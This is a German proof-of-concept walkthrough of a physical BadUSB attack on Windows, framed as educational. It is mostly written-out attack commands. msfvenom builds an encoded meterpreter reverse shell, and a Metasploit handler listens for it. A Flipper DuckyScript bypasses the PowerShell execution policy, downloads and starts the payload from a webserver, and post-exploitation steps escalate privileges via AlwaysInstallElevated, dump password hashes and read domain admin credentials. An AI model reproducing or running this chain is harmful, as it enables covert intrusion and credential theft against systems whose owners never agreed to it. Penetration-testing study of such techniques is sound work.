FatCat Attack PoC

In diesem PoC nutzen wir mehrere Sicherheitslücken, um uns volle Rechte über ein System zu sichern.

 _____     _    ____      _
|  ___|_ _| |_ / ___|__ _| |_
| |_ / _` | __| |   / _` | __|
|  _| (_| | |_| |__| (_| | |_
|_|  \__,_|\__|\____\__,_|\__|
Attack PoC

Achtung!

Die Techniken und Methoden in diesem Artikel sind ausschließlich für Lernzwecke. Ein Missbrauch ist strafbar!¹⁾

Zielsetzung soll sein, relevante SAM Daten aus der Registry abzuziehen. Hierzu wird der Flipper als BadUSB Device benutzt. Die PowerShell Execution Policy soll umgangen werden und mit einer Privilege Escalation die erforderlichen Rechte gesichert werden. Folgende Daten sollen exfiltriert werden:

User	Passwort	Hash
Host \ User
Host \ Admin
Domain \ Admin

AV deaktivieren
Payload erstellen
handler starten
BadUSB Angriff
RemoteShell nutzen zum Erkunden
Exploit suchen
Exploit anwenden
Creds einsammeln

Attack Chain Step	Attack Technique	Attack Tool
Weaponization	Exploit, Payload	msfvenom²⁾
Delivery	Physical access, Injection	Flipper³⁾, BadUSB⁴⁾
Delivery	Bypass	PowerShell Restrictions⁵⁾
Exploitation	Reverse Shell	Metasploit⁶⁾
	Enumeration	Enumerate System Info JAWS⁷⁾, SessionGopher⁸⁾, weak Service Permissions⁹⁾, Primary Access Token Manipulation¹⁰⁾, Unquoted Service Path ¹¹⁾, PassTheHash ¹²⁾ ¹³⁾, BetterSafetyKatz (Builds local, obfuscating not complete), Search for local Exploits¹⁴⁾
	Privilege Escalation¹⁵⁾	AlwaysInstallElevated ¹⁶⁾
Actions on Objectives	Exfiltration	Exfiltrate Data

Metasploit starten
cmd öffnen

cmd

Payload generieren

msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.2.77 LPORT=50666 -e x86/shikata_ga_nai -i 5 -f exe > msfpayload.exe

Shell verlassen

exit

Payload auf einem Webserver hinterlegen

Payload generieren

Multi Handler Server starten

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.77
set LPORT 50666
exploit

Metasploit Handler konfigurieren und starten

Mit dem Flipper, wird folgendes Script auf dem Zielsystem ausgeführt

WINDOWS r
DELAY 2000
STRING powershell.exe
DELAY 3000
ENTER
DELAY 5000
STRING Set-ExecutionPolicy Bypass -Scope Process -force
DELAY 3000
ENTER
DELAY 3000
STRING irm https://<DEIN-COOLER-WEBSERVER>/msfpayload.exe -OutFile msfpayload.exe
DELAY 3000
ENTER
DELAY 5000
STRING Start-Process msfpayload.exe
DELAY 3000
ENTER
DELAY 3000
STRING exit
DELAY 1500
ENTER

Flipper Attacke wird ausgeführt

getsystem
hashdump
ls
getwd
cd c:
cd Glob_Share
ls
background
use post/multi/recon/local_exploit_suggester
sessions
set session 1
run
use exploit/windows/local/always_install_elevated
set session 1
exploit
cd glob_share
type Domain-Admin-Creds.txt
hashdump
sessions -i 1